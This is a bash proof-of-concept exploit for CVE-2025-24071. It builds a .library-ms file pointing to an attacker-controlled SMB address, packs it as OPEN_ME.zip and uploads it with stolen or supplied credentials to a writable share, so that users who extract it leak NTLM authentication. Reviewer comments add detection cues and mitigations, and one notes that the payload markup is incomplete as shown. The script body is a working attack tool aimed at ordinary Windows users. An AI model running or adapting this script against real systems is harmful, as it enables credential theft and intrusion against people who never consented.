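#!/bin/bash
# CVE-2025-24071 - Windows File Spoofing Vulnerability
# By f4dee
# Requirements zip, smbclient
#
# Overview (reviewer notes):
#   Proof-of-concept for CVE-2025-24071. The script writes a file named
#   pwn3d.library-ms that references a UNC path (\\<-i address>\smbFolder),
#   packs it into OPEN_ME.zip, and uploads that archive with smbclient to a
#   writable share on the target, using the credentials given with -u / -p.
#   As publicly described, the issue lets Windows Explorer contact the
#   referenced SMB host when such a file is extracted from an archive, which
#   exposes the extracting user's NTLM authentication to that host.
#
#   NOTE(review): in this listing the payload assignment holds only the UNC
#   path; the library markup that would surround it is absent from the page
#   and is reproduced here exactly as shown.
#
# What a defender can look for, based on what this script does:
#   - an archive named OPEN_ME.zip holding pwn3d.library-ms appearing on a
#     file share, written over SMB by an authenticated account;
#   - .library-ms files inside archives in general (rare in normal use);
#   - outbound SMB (TCP 445) from a workstation to an unexpected address
#     shortly after an archive is extracted.
#   Mitigations: apply the vendor security update for CVE-2025-24071, block
#   outbound SMB to untrusted networks, and restrict or audit NTLM.
#
# Usage: see helpPanel (-i, -t, -d, -u, -p are all required).

set -euo pipefail

# Colours
readonly greenColour="\e[0;32m\033[1m"
readonly endColour="\033[0m\e[0m"
readonly redColour="\e[0;31m\033[1m"
readonly blueColour="\e[0;34m\033[1m"
readonly yellowColour="\e[0;33m\033[1m"
readonly purpleColour="\e[0;35m\033[1m"
readonly turquoiseColour="\e[0;36m\033[1m"
readonly grayColour="\e[0;37m\033[1m"

# Local artefacts created in the current working directory.
readonly library_file="pwn3d.library-ms"
readonly archive_file="OPEN_ME.zip"

# NOTE(review): this installs packages under sudo with -y and no
# confirmation, and assumes an apt-based system. Kept as in the original.
if ! command -v zip >/dev/null 2>&1 || ! command -v smbclient >/dev/null 2>&1; then
  echo "[!] Missing requirements. Installing zip and smbclient..."
  sudo apt install zip smbclient -y
fi

#######################################
# Restore the cursor and remove the local artefacts.
# Runs on every exit path: under `set -e` a failing zip or smbclient would
# otherwise leave the cursor hidden (tput civis) and the files on disk.
#######################################
cleanup() {
  # tput can fail when no terminal is attached; that must not mask the
  # script's real exit status.
  tput cnorm 2>/dev/null || true
  rm -f -- "$library_file" "$archive_file"
}
trap cleanup EXIT

#######################################
# SIGINT handler: report the interruption, clean up, exit non-zero.
#######################################
function ctrl_c(){
  echo -e "\n\n${redColour}[!] Exiting...${endColour}\n"
  cleanup
  exit 1
}

# Ctrl+C
trap ctrl_c SIGINT

#######################################
# Print the usage text to stdout.
# Globals: colour constants (read), $0 (read)
#######################################
function helpPanel(){
  echo -e "\n${yellowColour}[+]${endColour}${grayColour} Usage:${endColour}${blueColour} $0${endColour}${greenColour} -i${endColour}${yellowColour} 'YOUR_IP'${endColour}${greenColour} -t${endColour}${yellowColour} 'TARGET_IP'${endColour}${greenColour} -d${endColour}${yellowColour} 'DIRECTORY_WRITE'${endColour} ${greenColour}-u${endColour}${yellowColour} 'USER'${endColour}${greenColour} -p${endColour}${yellowColour} 'PASSWORD'${endColour}\n"
  echo -e "\t${turquoiseColour}-i)${endColour}${grayColour} Your IP address${endColour}"
  echo -e "\t${turquoiseColour}-t)${endColour}${grayColour} Target IP${endColour}"
  echo -e "\t${turquoiseColour}-d)${endColour}${grayColour} A remote SMB share with write permissions (e.g.) C, ADMIN, IPC, SYSVOL, etc) ${endColour}"
  echo -e "\t${turquoiseColour}-u)${endColour}${grayColour} Username${endColour}"
  echo -e "\t${turquoiseColour}-p)${endColour}${grayColour} Password${endColour}"
  echo -e "\t${turquoiseColour}-h)${endColour}${grayColour} Display this help panel${endColour}"
}

#######################################
# Build the library file and archive, then upload the archive over SMB.
# Arguments:
#   $1 - address placed in the UNC path written to the library file
#   $2 - target host (pinged once, then used as the SMB server)
#   $3 - share name on the target
#   $4 - SMB username
#   $5 - SMB password
# Returns: exits 1 if the target does not answer ping or the library file
#          is missing; any failing command aborts the script (set -e).
#######################################
function exploit(){
  local file="$library_file"
  local ip="$1"
  local target="$2"
  local directory="$3"
  local user="$4"
  local password="$5"
  local payload
  # Reproduced exactly as shown on the page (see the header note).
  payload=""" \\\\$ip\\smbFolder """

  tput civis
  echo -e "\n${purpleColour}-----Welcome to CVE-2025-24071-----${endColour}\n"
  echo -e "${yellowColour}[*]${endColour}${grayColour} Verifying connectivity with target host${endColour} ${yellowColour}$target...${endColour}\n"

  # Quoted, with `--`, so a value containing spaces or starting with '-'
  # is passed as one host argument rather than being split or parsed as
  # an option.
  if ! ping -c 1 -- "$target" &>/dev/null; then
    echo -e "${redColour}[!] Host $target did not respond to ping; it may be down or unreachable.${endColour}"
    exit 1
  fi

  sleep 1
  echo -e "${greenColour}[+] Host $target responded successfully to ping.${endColour}\n"
  echo "$payload" > "$file"
  sleep 1
  echo -e "${yellowColour}[>]${endColour}${grayColour} Library file $file created...${endColour}\n"
  sleep 1
  echo -e "${yellowColour}[>]${endColour}${grayColour} File created successfully $file...${endColour}\n"
  sleep 1

  if [[ ! -f "$file" ]]; then
    echo -e "${redColour}[!] File $file does not existing...${endColour}"
    exit 1
  fi

  zip -q "$archive_file" "$file"
  echo -e "${yellowColour}[>]${endColour}${grayColour} Creating ZIP file...${endColour}\n"
  sleep 1
  echo -e "${yellowColour}[>]${endColour}${grayColour} Uploading malicious.zip...${endColour}\n"
  # NOTE(review): the credential is part of an argv string, so it is visible
  # in the process list and shell history of the host running this script.
  # The service path is quoted so share names with spaces stay one argument.
  smbclient "\\\\${target}\\${directory}" -U "$user%$password" -c "put $archive_file" &>/dev/null
  echo -e "${redColour}[!] Remove zip and pwn3d.library-ms...${endColour}\n"
  rm -f -- "$archive_file" "$file"
  sleep 1
  echo -e "${yellowColour}[~]${endColour}${grayColour} Payload sent successfully. Waiting :D ...${endColour}"
  tput cnorm
}

# Option parsing. Each value starts empty so that a repeated flag cannot
# stand in for a missing one; the original counter reached 5 on e.g.
# `-i a -i b -t c -d d -u e` and then hit an unbound variable under `set -u`.
ip=""
target=""
directory=""
user=""
password=""

while getopts "i:t:d:u:p:h" arg; do
  case "${arg}" in
    i) ip="${OPTARG}" ;;
    t) target="${OPTARG}" ;;
    d) directory="${OPTARG}" ;;
    u) user="${OPTARG}" ;;
    p) password="${OPTARG}" ;;
    h) helpPanel; exit 0 ;;
    *) helpPanel; exit 1 ;;
  esac
done
shift "$((OPTIND - 1))"

# Stray positional arguments are a usage error; the original printed the
# help text and then carried on.
if (( $# > 0 )); then
  helpPanel
  exit 1
fi

if [[ -n "$ip" && -n "$target" && -n "$directory" && -n "$user" && -n "$password" ]]; then
  exploit "$ip" "$target" "$directory" "$user" "$password"
else
  helpPanel
  exit 1
fi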